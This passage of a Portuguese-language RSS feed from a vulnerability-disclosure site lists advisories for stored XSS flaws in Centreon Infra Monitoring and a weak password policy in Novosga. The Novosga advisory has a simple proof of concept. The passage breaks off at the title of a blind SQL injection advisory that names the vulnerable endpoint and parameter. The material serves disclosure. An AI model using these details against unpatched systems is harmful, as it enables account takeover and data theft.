&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração de acesso à Ação ACL) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8429-centreon-web-all-versions-medium-severity-5119&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8429-centreon-web-all-versions-medium-severity-5119&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8430</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8430/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8430/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8430-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8430: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8430&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8430&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração dos Conectores de Comandos.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração dos Conectores de Comandos) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8430-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8430: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8430&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8430&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração dos Conectores de Comandos.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração dos Conectores de Comandos) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8430-centreon-web-all-versions-medium-severity-5118&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8430-centreon-web-all-versions-medium-severity-5118&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8459</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8459/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8459/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8459-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8459: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8459&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8459&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios baixos pode injetar XSS na página &amp;#34;Monitorando Tempos de Inatividade Recorrentes&amp;#34;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade &amp;#34;Neutralização Indevida de Entrada Durante a Geração de Páginas Web&amp;#34; (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos do agendador de tempos de inatividade recorrentes) permite XSS Armazenado. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8459-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8459: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8459&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8459&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios baixos pode injetar XSS na página &amp;#34;Monitorando Tempos de Inatividade Recorrentes&amp;#34;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade &amp;#34;Neutralização Indevida de Entrada Durante a Geração de Páginas Web&amp;#34; (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos do agendador de tempos de inatividade recorrentes) permite XSS Armazenado. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8459-centreon-web-all-versions-high-severity-5117&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8459-centreon-web-all-versions-high-severity-5117&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-11322</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-11322/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-11322/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-11322-vulnerabilidade-de-política-de-senhas-fraca-na-função-criar-novos-usuários&amp;#34;&amp;gt;CVE-2025-11322: Vulnerabilidade de Política de Senhas Fraca na função Criar novos Usuários
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11322&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11322&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Política de Senhas Fracas foi identificada na funcionalidade de registro de usuários do aplicativo Novosga. Essa vulnerabilidade permite a criação de contas com senhas extremamente fracas e previsíveis, como &amp;lt;code&amp;gt;123456&amp;lt;/code&amp;gt;. Isso expõe a plataforma a ataques de força bruta e preenchimento de credenciais.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;amp;laquo;p style=&amp;amp;ldquo;text-align: justify;&amp;amp;quot;&amp;amp;gt;O aplicativo não consegue impor uma política de senhas fortes. Como resultado, os usuários podem registrar contas com senhas fracas, comuns e conhecidas, comprometendo a segurança da autenticação da plataforma.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-11322-vulnerabilidade-de-política-de-senhas-fraca-na-função-criar-novos-usuários&amp;#34;&amp;gt;CVE-2025-11322: Vulnerabilidade de Política de Senhas Fraca na função Criar novos Usuários
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11322&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11322&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Política de Senhas Fracas foi identificada na funcionalidade de registro de usuários do aplicativo Novosga. Essa vulnerabilidade permite a criação de contas com senhas extremamente fracas e previsíveis, como &amp;lt;code&amp;gt;123456&amp;lt;/code&amp;gt;. Isso expõe a plataforma a ataques de força bruta e preenchimento de credenciais.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;amp;laquo;p style=&amp;amp;ldquo;text-align: justify;&amp;amp;quot;&amp;amp;gt;O aplicativo não consegue impor uma política de senhas fortes. Como resultado, os usuários podem registrar contas com senhas fracas, comuns e conhecidas, comprometendo a segurança da autenticação da plataforma.&amp;lt;/p&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Componente vulnerável: &amp;lt;code&amp;gt;Registro de usuário / criação de senha&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesse a página de registro do usuário após efetuar login com a conta de Administrador.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Crie uma nova conta de usuário com a senha &amp;lt;code&amp;gt;123456&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;O aplicativo aceita a senha fraca sem restrições e cria a conta com sucesso.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11322/image.png&amp;#34;
	width=&amp;#34;942&amp;#34;
	height=&amp;#34;739&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11322/image_hu_5efc7146b11f1523.png 480w, /p/cve-2025-11322/image_hu_ad16b066d772cdf2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;127&amp;#34;
		data-flex-basis=&amp;#34;305px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11322/image-1.png&amp;#34;
	width=&amp;#34;939&amp;#34;
	height=&amp;#34;784&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11322/image-1_hu_6250a21d35ef1c30.png 480w, /p/cve-2025-11322/image-1_hu_2a40994e5a3ad755.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;119&amp;#34;
		data-flex-basis=&amp;#34;287px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Aumento do risco de ataques de força bruta e de preenchimento de credenciais.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a contas de usuários ou administrativas.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Aumento de privilégios por meio de contas comprometidas.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Postura geral de segurança do aplicativo reduzida.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/NovoSga/CVE-2025-11322.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/NovoSga/CVE-2025-11322.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 06 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-61603</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-61603/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-61603/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-61603-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id_pet-do-endpoint-petprofile_petphp&amp;#34;&amp;gt;CVE-2025-61603: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/pet/profile_pet.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61603&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61603&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
